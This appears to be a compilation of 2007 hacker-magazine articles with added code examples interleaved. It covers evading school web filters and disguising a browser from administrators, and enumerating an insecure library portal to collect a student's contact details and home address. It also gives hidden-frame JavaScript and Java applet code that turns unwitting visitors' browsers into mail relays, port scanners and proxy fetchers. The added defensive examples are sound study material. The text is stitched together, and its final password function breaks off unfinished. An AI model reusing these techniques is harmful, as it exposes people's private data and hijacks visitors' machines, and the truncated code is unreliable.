Web Browsing Over a Dynamic Tunnel
In order to use a web browser over a dynamic tunnel, you need to be able to modify the browser's proxy settings. In your current restricted environment you are unable to modify your school's/work's web browser (which is Internet Explorer (boo!)) settings. However, this isn't a problem for a ninja like yourself. All you must do is acquire a web browser that you have full control over. However, you can't leave any trace of using another web browser (for it is not the ninja way), so installing a new one is out of the question. This is where Firefox Portable (a mobile install-free version of Firefox) steps in. Download FP from http://portableapps.com/apps/internet/firefox_portable (this article covers using Firefox Portable 2.0) and extract it to a USB jump drive or to your hard drive for later burning to a CD.
To use FP over a dynamic tunnel: First start FP, click on Tools and choose Options. Click the button at the top labeled Advanced. Under the Connection section click the button labeled Settings... In the connection settings window choose the third option labeled Manual proxy configuration: and in the entry box next to the words SOCKS Host enter 127.0.0.1. In the entry box to the right of the entry box for SOCKS Host enter the SourcePort you used when creating your dynamic tunnel. Make sure that SOCKS v5 is selected and click OK.
FP will now send and receive all traffic over your dynamic tunnel; however by default FP does DNS lookups locally which can give away what you are browsing (very un-ninja like). To configure FP to send DNS lookups over a dynamic tunnel: In the address bar type about:config and hit enter; in the entry box next to the word Filter enter network.proxy.socks_remote_dns, right click the result and select the Toggle option.
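What the socks_remote_dns toggle actually changes is visible on the wire. The following is an added example (not from the article, and not PuTTY or Firefox code) that builds the SOCKS5 CONNECT request (RFC 1928) the way a browser does in both modes and parses it the way the SOCKS end of the dynamic tunnel does. With the toggle off, the browser resolves the hostname through the local resolver first and sends an IPv4 address (ATYP 0x01), so the name leaks to whoever runs DNS on the restricted network; with it on, the raw hostname (ATYP 0x03) travels inside the tunnel and is resolved at the SSH server. The address 72.14.207.99 is the one used in the article; the recording resolver is a constructed stand-in for the local DNS client.

```javascript
// Node.js; uses only the built-in Buffer.

function isIPv4(s) {
  const parts = s.split('.');
  return parts.length === 4 &&
         parts.every(p => /^\d{1,3}$/.test(p) && Number(p) <= 255);
}

// Build the SOCKS5 CONNECT request a client would send through the -D port.
// remoteDns=false mimics Firefox's default: resolve locally, send the IP.
// remoteDns=true mimics socks_remote_dns=true: send the hostname as-is.
function buildSocks5Connect(host, port, remoteDns, resolver) {
  let addr;
  if (isIPv4(host)) {
    addr = Buffer.concat([Buffer.from([0x01]),
                          Buffer.from(host.split('.').map(Number))]);
  } else if (remoteDns) {
    // ATYP 0x03: one length byte followed by the domain name; no local lookup
    const name = Buffer.from(host, 'ascii');
    addr = Buffer.concat([Buffer.from([0x03, name.length]), name]);
  } else {
    // local lookup first (this is the leak), then ATYP 0x01 with the answer
    const ip = resolver(host);
    addr = Buffer.concat([Buffer.from([0x01]),
                          Buffer.from(ip.split('.').map(Number))]);
  }
  const portBuf = Buffer.alloc(2);
  portBuf.writeUInt16BE(port, 0);
  // VER=5, CMD=1 (CONNECT), RSV=0, then DST.ADDR and DST.PORT
  return Buffer.concat([Buffer.from([0x05, 0x01, 0x00]), addr, portBuf]);
}

// What the SOCKS server side (the SSH end of the tunnel) sees in the request.
function parseSocks5Connect(buf) {
  if (buf[0] !== 0x05 || buf[1] !== 0x01) throw new Error('not a SOCKS5 CONNECT');
  const atyp = buf[3];
  let host, next;
  if (atyp === 0x01) {
    host = Array.from(buf.subarray(4, 8)).join('.');
    next = 8;
  } else if (atyp === 0x03) {
    const len = buf[4];
    host = buf.subarray(5, 5 + len).toString('ascii');
    next = 5 + len;
  } else {
    throw new Error('unsupported ATYP ' + atyp);
  }
  return { atyp, host, port: buf.readUInt16BE(next) };
}

// Constructed local resolver that records every name it is asked for, so the
// example can show whether a lookup left the machine.
function makeRecordingResolver() {
  const seen = [];
  const resolve = name => { seen.push(name); return '72.14.207.99'; };
  return { resolve, seen };
}

// Returns what the tunnel end sees and which names the local resolver saw.
function demo(remoteDns) {
  const r = makeRecordingResolver();
  const req = buildSocks5Connect('www.google.com', 80, remoteDns, r.resolve);
  return { parsed: parseSocks5Connect(req), localLookups: r.seen };
}

console.log('remote DNS off:', JSON.stringify(demo(false)));
console.log('remote DNS on: ', JSON.stringify(demo(true)));
```

A filtering proxy or DNS logger on the restricted network sees the name in the first case and only an opaque SSH session in the second, which is the whole reason the article has you flip the preference.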
Cloaking FP to look like IE
Well now you've got a copy of FP using a dynamic tunnel to browse the web, but FP isn't very stealthy and any passing teacher/administrator will be all over you when they see it. As a ninja stealth is very important, so your next priority is to configure Firefox Portable so that it looks like Internet Explorer. You will need the following in order to effectively cloak your copy of FP:
- Neofox IE 6: https://addons.mozilla.org/firefox/4327/. A theme that makes FP look like IE 6.0
- Firesomething: https://addons.mozilla.org/firefox/31/. An extension that allows you to change the title of the web browser. Note: you will have to modify the .xpi slightly to make it install with FP 2.0. The steps on how to do this are in the first comment of the page.
- Internet Explorer XP Icons: http://www.bamm.gabriana.com/cgi-bin/download.pl/package/ieiconsxp.xpi. An extension that replaces the Firefox icons with the ones used by IE.
Configure Firesomething to change the browser title from "Mozilla Firefox" to "Microsoft Internet Explorer." FP should now at least resemble IE at a passing glance and with some toolbar and appearance tweaking on your part, no teacher/administrator will spare it a second glance.
With your new skills in Network Ninjitsu, no web filter/firewall will stand a chance.
by valnour
This article outlines a very simple hack on a very prominent technical school's online library. It may sound like getting into a school's library isn't that big a deal, but this particular school (and I'm sure many others like it) requests that you input contact information when logging in to the system for the first time. This allows a potential attacker to gain some sensitive data on a student such as: location of the school they attend, full name, phone number (home and work), email addresses, and it also allows you to change passwords without knowing the old one.
Procedure
When logging into this school's student library, you are prompted for your username and password. After providing this you are logged into the system. However, if you log into the school's student portal (which shows school news and provides a link to the library and such) with your username and password, then follow the link to the school's library, a completely different procedure is followed. Instead of logging in with any sort of authentication or checking session IDs or even cookies, it just takes you to a URL structured like this:
http://library.majorschool.edu/portal.asp?pi=student#&role=student
Replace "student#" with, well, your student number and you have instant access. No password checks or anything.
After I discovered this, I just started plugging in different numbers. I tried about ten in all and only found one other student. Now I'm sure if I would have poked around some more I could have found several others, but I didn't want to raise any suspicion. As far as the other student I found, I was able to get their email addresses, two phone numbers, and full name. I was able to locate her on myspace with this information and was able to gather her home address after poking around on Google with all the other information I found. Now keep in mind that this school has upwards of 70 campuses in the United States. This particular person was on the west coast. I live closer to the east.
Conclusion
This prominent technical school, which even offers a class entitled "Security Applications of Common IT Platforms," obviously created a weak point in their online resources. This problem was very simple, but still was able to give enough information for an attacker to gain plenty of ground in very little time. All that was needed was an eight digit, nonrandom number that could easily have been social engineered. I hope I have given enough information to make this useful, especially to students at this school. But I also hope I have been vague enough so as to put no one's personal data at risk.
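The flaw is that the library handler trusts the pi= parameter in the URL instead of the identity the portal already authenticated. The following is an added example (not the school's code; the request and session shapes are assumed) showing that handler as the article describes it next to a fixed version. The fix is the one the article implies: take the student number from the server-side session the portal login created, and treat a pi= that disagrees with it as something to refuse and log, since a mismatch is exactly what enumeration looks like. The student records are constructed sample data.

```javascript
// Constructed "database": eight-digit student number -> contact record
const STUDENTS = {
  '10000001': { name: 'Student One', email: 'one@example.edu', phone: '555-0101' },
  '10000002': { name: 'Student Two', email: 'two@example.edu', phone: '555-0102' },
};

// Minimal query-string parser for a request target like
// /portal.asp?pi=10000002&role=student
function parseQuery(url) {
  const q = url.split('?')[1] || '';
  const out = {};
  for (const pair of q.split('&')) {
    if (!pair) continue;
    const [k, v = ''] = pair.split('=');
    out[decodeURIComponent(k)] = decodeURIComponent(v);
  }
  return out;
}

// Vulnerable handler, as the article describes it: whoever supplies a valid
// pi= gets that student's record. No session, no cookie, no check at all.
function portalVulnerable(url) {
  const { pi } = parseQuery(url);
  const rec = STUDENTS[pi];
  return rec ? { status: 200, body: rec } : { status: 404, body: null };
}

// Hardened handler: identity comes only from the server-side session that the
// portal login established. A pi= in the URL is at best redundant; if it names
// someone else it is refused and should be logged as probable enumeration.
// The role= parameter is likewise ignored; role belongs in the session too.
function portalHardened(url, session) {
  if (!session || !session.studentId) return { status: 401, body: null };
  const { pi } = parseQuery(url);
  if (pi !== undefined && pi !== session.studentId) {
    return { status: 403, body: null, note: 'pi mismatch for ' + session.studentId };
  }
  const rec = STUDENTS[session.studentId];
  return rec ? { status: 200, body: rec } : { status: 404, body: null };
}

// Stand-alone run: same request, with and without a real session behind it
const url = '/portal.asp?pi=10000002&role=student';
console.log('vulnerable:', JSON.stringify(portalVulnerable(url)));
console.log('hardened, logged in as 10000001:',
            JSON.stringify(portalHardened(url, { studentId: '10000001' })));
console.log('hardened, logged in as 10000002:',
            JSON.stringify(portalHardened(url, { studentId: '10000002' })));
```

Note that the hardened version does not need the number to be random or secret: once the lookup key is bound to the authenticated session, guessing eight-digit student numbers tells the attacker nothing.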
Covert Channel
by OSIN
This article is a demonstration of how various types of communication channels can be rendered in unusual ways. I should point out that the purpose of writing this article is not to introduce worms, trojans, or yet another virus, but to get you to view tools and techniques in a new manner, especially in ways they were never meant to be used. That being said, I will first spell out how the actual mechanism of sending a message over the Internet works. Then I will delve into the details and scripts required to actually perform the task. But, you should realize that this type of communication is not for time-sensitive information. In some ways these techniques are something like a "Poor Man's Tor." For purposes of this article I will assume the reader has some working knowledge of HTML coding with IFrames, Javascript, and Java-to-Javascript communication. Additionally, the full source code for the applet and main HTML/Javascript page will be available at http://uk.geocities.com/osin1941/app/app.html.
The way this communication scenario goes is this. Two people in diverse locations need to send messages to each other. For simplicity's sake, this scenario takes into account one person, Shemp, leaving a text message somewhere out on the Internet. The other person, Curly, will create a website that will retrieve the message from Shemp's website. For this discussion both websites will be in the same domain, say for example NyukNyukNyuk. You'll understand later why having that setup makes the communication much easier. Now, you may be asking yourself, why doesn't Curly merely visit Shemp's website? It could be that both parties do not want to expose their browsing habits to their ISP or to the NSA. And even if they were using an anonymizing system such as Tor, they might get blocked by certain countries' tyrannical filtering schemes, such as the Great Firewall of China. So Curly's website is really the catalyst which kicks off everything and this whole scenario hinges on Curly's ability to attract an innocent web viewer to view his website.
Curly will create a web page which will consist of two frames, a top and bottom frame. The top frame will show some innocuous information that the innocent web visitor will see. This can be anything so I don't show any html code for top.html. The bottom frame is where the action will take place. The html code for the page that creates the frames looks like this:
index.html
    <frameset rows="100%,0%">
    <frame name="top" src="top.html" NORESIZE>
    <frame name="bottom" src="bottom.html" NORESIZE>
    </frameset>
It should be obvious by now that the innocent web viewer in most cases will not even realize there is a bottom frame, but it is there even though we assigned 100 percent of the browser window to the top. It is in that bottom frame where all the action takes place.
Operation Moe
About ten years ago it was popular for website designers to create little cgi and perl test scripts to test sending emails to an email account. There used to be many of those scripts out on the Internet but over time most disappeared. But not all of them were deleted. Some have been out there for years and they aren't being monitored. I personally know of at least three sites that still allow you to pass text messages in the URL of the http GET call. I was able to find them by using Google's advanced search settings. I won't give the exact search criteria I used because I don't want to start a spam attack, but it shouldn't be that hard for you to figure out. Sending email this way is not really hard. You just redirect the bottom frame to the script's location, which is usually an acknowledgment page. Here's the bit of Javascript code that is loaded by a call in the body html tag when bottom.html is loaded, i.e., <body onload="dothis();">
    function dothis() {
        // change the line below to whatever email script you are using.
        // The message text is URL-encoded (%20 for each space) so that it survives the GET.
        var url = "http://www.somedomain.com/mail.cgi?name=Shemp&sender=shemp@NyukNyukNyuk.com&recip=curly@NyukNyukNyuk.com&subj=My Message&text=Shemps%20message%20to%20Curly";
        // redirect the (invisible) bottom frame to the script, which sends the mail
        this.document.location.href = url;
    }
But how does Shemp's message actually get to Curly? Well, in that case we're going to use the IFrame tag. Let's say that Shemp has created an account on NyukNyukNyuk under his name and has placed a flat text file with the message "How dare you look like someone I hate!" Curly also has a separate account on NyukNyukNyuk for himself, but his homepage is the framed page discussed above. He has "enticing" visual and textual information to lure someone to view it which kicks off the Javascript function. But first, Curly has to make some code changes. Here is the IFrame code in bottom.html:
    <iframe src="http://www.NyukNyukNyuk.com/shemp/message.txt"
        name="test" onload="dothis(this);">
    </iframe>
But Curly also has to make some code changes to the Javascript function dothis. Using a search engine, Curly finds some code that will basically pull out the text (technically it pulls out the html code) from the IFrame:
    function dothis(iframe) {
        var content = "";
        // the three branches cover the different ways browsers expose an IFrame's document
        if (iframe.contentDocument) {
            content = iframe.contentDocument.body.innerHTML;
        } else if (iframe.contentWindow) {
            content = iframe.contentWindow.document.body.innerHTML;
        } else if (iframe.document) {
            content = iframe.document.body.innerHTML;
        }
        // strip the <pre> and </pre> tags the browser wraps around a plain text file
        content = content.substring(5, content.length - 6);
        var url = "http://www.somedomain.com/mail.cgi?name=Shemp&sender=shemp@NyukNyukNyuk.com&recip=curly@NyukNyukNyuk.com&subj=My Message&text=" + content;
        this.document.location.href = url;
    }
One final note about this technique. As I said earlier it is easier if both websites come from the same domain. By default, most browsers prevent cross-site scripting across different domains. This is actually a good thing, but there's nothing preventing a user from allowing this in their browser. So in theory groups of people working together could set up a covert channel by changing the settings in their browsers to deliberately allow messages to be sent from separate domains. Also, expect the same message to be delivered multiple times.
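From the other side of the fence, the relay in Operation Moe leaves a distinctive trace on the host that still runs one of those forgotten mail scripts: a GET to the script carrying a recipient and a message body, with a Referer pointing at a page on some other site (the hidden bottom frame). The following is an added example (not from the article) of detection logic that parses constructed Apache combined-format access log lines and picks out that pattern; the script path, host names and log contents are constructed to match the article's scenario and are not real sites.

```javascript
// Constructed sample log lines (Apache combined format). Line 2 is the relay
// hit: the request came from a page on NyukNyukNyuk, not from this host.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Mar/2007:14:01:02 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Mar/2007:14:01:03 -0500] "GET /mail.cgi?name=Shemp&sender=shemp%40NyukNyukNyuk.com&recip=curly%40NyukNyukNyuk.com&subj=My%20Message&text=How%20dare%20you HTTP/1.1" 200 311 "http://www.NyukNyukNyuk.com/curly/bottom.html" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Mar/2007:14:02:10 -0500] "GET /mail.cgi?name=Admin&recip=me%40somedomain.com&text=test HTTP/1.1" 200 311 "http://www.somedomain.com/test.html" "Mozilla/5.0"',
];

// ip, time, method, target, status, referer, user-agent
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, referer] = m;
  const [path, query = ''] = target.split('?');
  const params = {};
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const [k, v = ''] = pair.split('=');
    params[decodeURIComponent(k)] = decodeURIComponent(v.replace(/\+/g, ' '));
  }
  return { ip, time, method, path, params, status: Number(status), referer };
}

// Host part of an absolute URL, lower-cased; null for "-" or garbage.
function hostOf(url) {
  const m = /^[a-z]+:\/\/([^\/:]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Returns the relay hits: GETs to the mail script that carry a recipient and a
// body and were referred from a page on some other host. ownHost is the host
// this log belongs to; scriptPath is the forgotten test script's location.
function findRelayHits(lines, ownHost, scriptPath = '/mail.cgi') {
  const hits = [];
  for (const line of lines) {
    const r = parseLogLine(line);
    if (!r || r.method !== 'GET' || r.path !== scriptPath) continue;
    if (!('recip' in r.params) || !('text' in r.params)) continue;
    const refHost = hostOf(r.referer);
    if (refHost && refHost !== ownHost.toLowerCase()) {
      hits.push({ ip: r.ip, time: r.time, recip: r.params.recip,
                  refHost, textLength: r.params.text.length });
    }
  }
  return hits;
}

// Stand-alone run
for (const h of findRelayHits(SAMPLE_LOG, 'www.somedomain.com')) {
  console.log('relay hit from', h.ip, 'via', h.refHost, 'to', h.recip,
              '(' + h.textLength + ' chars)');
}
```

The obvious remediation for the operator is the one the article's own premise relies on nobody doing: remove the script, or at least refuse GET and off-site referers, since a legitimate test form never needs either.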
Operation Larry
I know what you're thinking. Could the above technique work by sending base64-encoded images? In theory yes, but in practice most likely not. That's because a lot of programmers wisely limited the size of the submitted message in their scripts. But that's not going to deter Shemp and Curly. They've thought of another way to communicate: Java-to-JavaScript communication.
This next technique has two requirements but, believe it or not, it's actually not impossible to find a website that fulfills them. In fact, I actually know of such a website, but I won't mention it since they have been very good to me. Anyway, the requirements are these:
a. The website allows users to have accounts (creating HTML pages and an email account).
b. There is an SMTP server and an HTML web server running on the same machine.
2600 Magazine, Spring 2007, page 56
For those of you who are not Java programmers, an (unsigned) applet normally cannot open a network connection. But there is one special case in which an applet can: when it's communicating back to the server from whence it came. In that case, if there is a server listening on any port of that host, the applet can normally make a connection to its server of origin on that port; the sandbox restricts the host, not the port number. For the purposes of this demonstration it is assumed the SMTP server relays messages to Curly's email account of the same domain.
Curly will be the one who will have to implement the Java-JavaScript communications. Basically, JavaScript communicates with Java by calling one of the Java methods of an applet:
    this.document.applets[0].sendEmail(message);
In this case the method sendEmail is a Java method that performs the call to the SMTP server. On the other side, Java can communicate with JavaScript methods, but we have to set up some special sections in the Java code that are not normally needed for an ordinary applet. The first is that we must import the class that allows an applet to call JavaScript. That line is added to the Java code, which is then recompiled:
    import netscape.javascript.*;
In most cases, especially on Windows machines, the netscape.javascript classes reside in the plugin.jar file. When you compile your applet you may have to specify the -classpath option in order to compile the Java code. Anyway, to use the class we must create a new JSObject instance:
    JSObject win = JSObject.getWindow(this);
Then from our applet we can call any JavaScript function in our page like so:
    win.call("dothis", null);
This would call a JavaScript function called dothis() with no variables passed to the function. As a side note, the null is actually a placeholder. That place is usually reserved for an Object[] array used to pass variables into the JavaScript function, but that functionality is beyond the scope of this article.
But we must also pass parameters to this applet in order for it to run correctly. Let's say Curly wants the option of either having Shemp's message sent to him via a script as we did in Operation Moe, or sending it by connecting to port 25 of our server of origin and sending the message manually, and he wants to switch between the two without recompiling the applet. Here is an example of how applet parameters are defined for Curly's applet:
    <applet code="app.class" width=1 height=1>
      <param name="helo_line"  value="helo NyukNyukNyuk.com">
      <param name="server"     value="10.0.0.1">
      <param name="smtp_port"  value="25">
      <param name="from_email" value="shemp@NyukNyukNyuk.com">
      <param name="to_email"   value="curly@NyukNyukNyuk.com">
      <param name="subject"    value="My Message to You">
      <param name="email_mode" value="homeserver">
    </applet>
Most of the parameters are self explanatory, but I should explain a few of them. The helo_line parameter is needed because some SMTP servers require a HELO before they will allow you to send email through them. You may have to play with that parameter in order to get the applet to work correctly with the server of origin. The "server" parameter is the server of origin's IP. And finally email_mode instructs the applet on which method it should use to send Shemp's message. The "homeserver" mode tells the applet to make a connection back to port 25 (the "smtp_port" value) of the "server" IP and send it to the user defined in "to_email", in this case a valid email account for the domain of the servicing SMTP server. The other option for email_mode is "script". This instructs the applet to call a JavaScript function and send the email via the technique introduced in Operation Moe. Recall that the message itself is retrieved by the IFrame in bottom.html and isn't defined as an applet parameter. It is already defined by the "content" variable.
Parameters for an applet are retrieved using the getParameter method for applets. So we would grab one of the parameters defined on the HTML page like this:
    String email_mode = getParameter("email_mode");
Note that you must pass the getParameter method the same name in your Java code as you did in the HTML code. And here is the snippet of code in the Java applet that sends the message:
    // needs java.io.* and java.net.*; server, helo_line, from_email,
    // to_email and email_mode are Strings read with getParameter(),
    // smtp_port is Integer.parseInt(getParameter("smtp_port"))
    public void sendEmail(String message) {
        if (email_mode.equals("script")) {
            // if email mode is by script, call the JavaScript function
            // sendContentOverWeb(): this is the JavaScript method that calls
            // the cgi email script. Note that 'message' is already available
            // to the JavaScript function as "content".
            System.out.println("Calling method sendContentOverWeb");
            win.call("sendContentOverWeb", null);
        } else {
            // else send by opening a network connection back to the
            // server we came from
            System.out.println("Calling server " + server);
            String inline = "";
            try {
                InetAddress addr = InetAddress.getByName(server);
                Socket sock = new Socket(addr, smtp_port);
                BufferedReader in = new BufferedReader(
                        new InputStreamReader(sock.getInputStream()));
                BufferedWriter out = new BufferedWriter(
                        new OutputStreamWriter(sock.getOutputStream()));
                // read in server's welcome banner
                inline = in.readLine();
                // write out helo line (SMTP lines end in CRLF)
                out.write(helo_line + "\r\n");
                out.flush();
                // read in server response
                inline = in.readLine();
                out.write("mail from: " + from_email + "\r\n");
                out.flush();
                inline = in.readLine();
                out.write("rcpt to: " + to_email + "\r\n");
                out.flush();
                inline = in.readLine();
                out.write("data\r\n");
                out.flush();
                inline = in.readLine();
                // write out the message, then the lone "." that ends DATA
                out.write(message + "\r\n");
                out.write(".\r\n");
                out.flush();
                // read in server response
                inline = in.readLine();
                out.write("quit\r\n");
                out.flush();
                sock.close();
            } catch (Exception e) {
                System.out.println("SMTP Error: " + e);
            }
        }
    }
As you can see, if the home server has an SMTP server running on it, there is the possibility that an applet could utilize its services, which is why it is generally not a good idea to run an SMTP server on the same machine as the web server. Note too that the code above reads each reply into inline and never looks at it; if the server rejects the HELO, the sender, or the recipient, the applet blindly carries on and reports nothing. But Curly has one more zany antic up his sleeve.
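What the "homeserver" branch actually says to port 25, as an added example that is not part of the original article: a Python client that drives the same HELO, MAIL FROM, RCPT TO, DATA and QUIT sequence but reads and checks every reply code, dot-stuffs the message body, and backs out with QUIT when the server refuses a step. The server it talks to is a constructed fake running in a thread on loopback, so the whole exchange runs offline; the host name, the addresses and the "relay only for @example.test" rule are assumptions for the demonstration, not values from the article.

```python
import socket
import threading


def fake_smtp_server(listener, store):
    """Constructed stand-in for the server of origin's SMTP daemon. Assumption:
    it relays only to @example.test, like the article's same-domain relay.
    The envelope and body it accepts are written into `store`."""
    conn, _ = listener.accept()
    with conn:
        rd = conn.makefile("rb")
        reply = lambda code, text: conn.sendall(("%d %s\r\n" % (code, text)).encode())
        reply(220, "mail.example.test ESMTP ready")
        in_data, body = False, []
        while True:
            raw = rd.readline()
            if not raw:
                break
            line = raw.decode(errors="replace").rstrip("\r\n")
            if in_data:                          # inside DATA: collect until a lone "."
                if line == ".":
                    in_data = False
                    store["body"] = "\n".join(body)
                    reply(250, "OK queued")
                else:                            # undo the client's dot-stuffing
                    body.append(line[1:] if line.startswith("..") else line)
                continue
            verb = line.split(" ", 1)[0].upper()
            if verb == "HELO":
                reply(250, "hello")
            elif verb == "MAIL":
                store["from"] = line.split(":", 1)[1].strip("<> ")
                reply(250, "OK")
            elif verb == "RCPT":
                rcpt = line.split(":", 1)[1].strip("<> ")
                if rcpt.endswith("@example.test"):
                    store["to"] = rcpt
                    reply(250, "OK")
                else:
                    reply(550, "relaying denied")   # the applet never notices this
            elif verb == "DATA":
                in_data = True
                reply(354, "end data with <CRLF>.<CRLF>")
            elif verb == "QUIT":
                reply(221, "bye")
                break
            else:
                reply(500, "command not recognized")


def send_mail(host, port, helo_line, mail_from, rcpt_to, message):
    """Drive the envelope the way the applet's homeserver mode does, but check
    each reply code. Returns (accepted, log); log is the list of
    (command, reply code) pairs so a refused step is visible."""
    log = []
    with socket.create_connection((host, port), timeout=5) as s:
        rd = s.makefile("rb")

        def reply_code():
            line = rd.readline().decode(errors="replace")
            return int(line[:3]) if line[:3].isdigit() else 0

        def cmd(label, text, expect):
            s.sendall((text + "\r\n").encode())      # SMTP lines end in CRLF
            code = reply_code()
            log.append((label, code))
            return code == expect

        if reply_code() != 220:                      # greeting banner
            return False, log
        for label, text in (("HELO", helo_line),
                            ("MAIL", "MAIL FROM:<%s>" % mail_from),
                            ("RCPT", "RCPT TO:<%s>" % rcpt_to),
                            ("DATA", "DATA")):
            if not cmd(label, text, 354 if label == "DATA" else 250):
                cmd("QUIT", "QUIT", 221)
                return False, log
        # Dot-stuffing: a body line that starts with "." gets a second "." so
        # the server cannot mistake it for the end-of-data marker.
        stuffed = "\r\n".join(("." + l) if l.startswith(".") else l
                              for l in message.splitlines())
        accepted = cmd("BODY", stuffed + "\r\n.", 250)
        cmd("QUIT", "QUIT", 221)
        return accepted, log


def demo(rcpt_to):
    """Run the exchange against the fake server on loopback."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    store = {}
    t = threading.Thread(target=fake_smtp_server, args=(listener, store), daemon=True)
    t.start()
    accepted, log = send_mail("127.0.0.1", listener.getsockname()[1],
                              "HELO NyukNyukNyuk.com", "shemp@example.test",
                              rcpt_to, "hello Curly\n.this line starts with a dot\n")
    t.join(5)
    listener.close()
    return accepted, log, store
```

demo("curly@example.test") returns accepted=True with the body intact, dot and all; demo("curly@elsewhere.test") returns False and the log shows ("RCPT", 550), which is exactly the case the applet's unchecked readLine() calls would have hidden.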
Operation Cheese
Getting back to the story, every now and then Curly forgets or makes a mistake and enters the wrong port number for the SMTP server in the applet's parameters. What he finds is that the applet throws an exception and fails to make a connection, since that erroneous port is naturally closed. Then he begins to wonder, "Can the replication of failure actually give an indication of what ports are open on the server of origin?" So, he decides to add an applet parameter called "applet_mode" which will allow him to test his theory. If the applet is in "smtp" mode, it does its normal emailing procedures as discussed in Operations Moe and Larry. But if it is in "nmap" mode, the applet will try to open a series of ports and email him which ports were found open. Since we already know that an applet can only communicate back to the server of origin, and that parameter is already defined, Curly must create two more parameters called "start_port" and "end_port". And he must create another method in his Java code to perform this function:
    // start_port and end_port are ints parsed from the applet parameters
    public void doNmap() {
        String openports = "The following ports are open on " + server + ": ";
        for (int i = start_port; i <= end_port; i++) {      // end_port inclusive
            try {
                InetAddress addr = InetAddress.getByName(server);
                Socket sock = new Socket();
                // a connect timeout keeps a filtered port from hanging the scan
                sock.connect(new InetSocketAddress(addr, i), 1000);
                // if this port is open, an exception will not be thrown and
                // the following code will be executed
                openports += i + " ";
                sock.close();
            } catch (Exception e) { }
        } // end for loop
        sendEmail(openports);
    }
Since Curly knows that a Java applet will even bypass a Tor connection and expose his real IP (the applet opens its own sockets and ignores the browser's proxy settings), having an innocent viewer run this code on their machine, using the methods discussed previously, is critical.
But let's say that in the process of running his applet in "nmap" mode Curly discovers that port 3128 is open on the server of origin! How convenient. For those of you who are unfamiliar with Squid, it is a proxy server that listens by default on port 3128. So Curly decides to add a third mode to his applet: http. In this mode the applet makes a call to port 3128 and, assuming the proxy is an open proxy server, it retrieves whatever web page Curly desires and emails the HTML code of the response back to him. In fact, why not have a list of URLs to pass off to the applet? First Curly creates another applet parameter:
    <param name="http_request_list"
           value="http://www.google.com|http://www.geocities.com|http://www.2600.com">
Note that each URL is separated by "|". Then he must update his Java code. The doHttp() method of his Java applet is a nearly exact replica of the doSmtp() method, except the input and output lines are different:
    // HTTP/1.0 rather than 1.1: the proxy then closes the connection after
    // the response, so the read-until-null loop below terminates. A 1.1
    // request would need a Host header and would keep the socket open.
    out.write("GET " + url + " HTTP/1.0\r\n");
    out.write("\r\n");
    out.flush();
    while ((str = in.readLine()) != null) {
        url_code += str;
    }
Then all the doHttp method has to do is call the sendEmail method and pass the url_code value to be emailed to Curly by whatever email mode is defined in the applet parameters of bottom.html. So, to end the story, the applet has three modes: smtp, nmap, http, and now the punch line: Moe, Larry, the Cheese!
How to cripple
by comfreak
comfreak@gmail.com
Watching cable news in October I saw the story of Joseph Duncan, a man who confessed to the murder of two adults and a teenager in Idaho. For more info see Google News and have yourself a merry time searching. However, the crux of the story caught me when I heard the FBI had his laptop and could not crack the encryption without his password. The news reporter asked aimless questions such as "How hard is it to encrypt a laptop?" and "Why is the FBI having such a hard time cracking this laptop?" Of course, news commentators are clueless on how easy it is to encrypt a drive and subsequently leave even the federal government apparently helpless.
It got me wondering just what kind of encryption this might be that the FBI went public with the information. Surely they would not want to embarrass themselves unless they truly needed this guy to give up his password. I heard on the same TV program one of the officers garble something about "It's called Pretty Good Program." I assume he is speaking of PGP (Pretty Good Privacy at pgpi.org) so it just got me thinking more and asking some questions. Can it really be just that simple to encrypt files beyond the power of the federal government? If it really is so strong, beyond the cracking power of the FBI, then clearly all security comes down to the quality of your password.
The commercial version of PGP features an option to encrypt an entire drive or create an encrypted virtual drive within your drive. That makes it very easy to keep an encrypted section and just send things that are of a "sensitive" nature to it. It could be the only thing between you and a jail cell depending on your specific issue with the law.
Whether the federal government can crack it or not doesn't matter if your password is something simple like "fluffy" or "1ZJ4". Perhaps something more obvious like your initials or your kids' name(s). For further illustration of the absurdity of people's passwords I'll point to a family member of mine who shall remain nameless. They use the same password for everything from their email to their financial data to their Windows password. The punch line comes in the fact that the same password phrase is also used as their license plate number. I couldn't make that up if I tried.
The bottom line I found from this story is that you really need to take passwords seriously. Unfortunately most people don't like to write down/remember more than one or two simple passwords. Of course, if for "some" reason you find yourself in a situation where you wish you had set better passwords, it will be too late. For example, let's say you find yourself on the wrong side of the law and some computer equipment is seized. Perhaps there is "information" on that equipment which could get you in more "trouble." You could end up compounding a simple problem. However, if you are using strong encryption and a string of tough passwords, you will be safe. If this laptop sent to the FBI is secure, your local crime lab will be even more helpless.
There are some excellent password generators I found just doing a simple search:
www.winguides.com/security/password.php
www.randpass.com
More advanced generators and downloadable programs:
www.mark.vcn.com/password/
www.grc.com/passwords.htm
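An offline counterpart to the generator sites listed above, added here as an example and not part of comfreak's article: it sizes a password or passphrase to a target number of entropy bits and draws it from the operating system's CSPRNG via the `secrets` module. The point it makes about "fluffy" is the only number a generator can honestly give: six lowercase letters are worth at most 26 bits even when chosen uniformly at random, and a dictionary word is worth far less. The word list is a constructed stand-in; the diceware size of 7776 is used only in the arithmetic.

```python
import math
import secrets
import string

# Constructed stand-in for a real word list (a diceware list has 7776 words).
WORDS = ("shemp", "curly", "moe", "larry", "cheese", "nyuk", "stooge", "whistle")
# 94 printable ASCII characters
SYMBOLS = string.ascii_letters + string.digits + string.punctuation


def entropy_bits(alphabet_size, length):
    """Entropy of `length` symbols drawn uniformly from an alphabet of
    `alphabet_size`: length * log2(alphabet_size). This is an upper bound;
    a human-chosen string of the same shape is worth less."""
    return length * math.log2(alphabet_size)


def length_for(target_bits, alphabet_size):
    """Fewest symbols needed to reach target_bits with uniform choice."""
    return math.ceil(target_bits / math.log2(alphabet_size))


def random_password(target_bits=80, alphabet=SYMBOLS):
    """Uniform random string reaching target_bits. secrets.choice reads the
    OS CSPRNG, unlike random.choice, which is seeded and predictable."""
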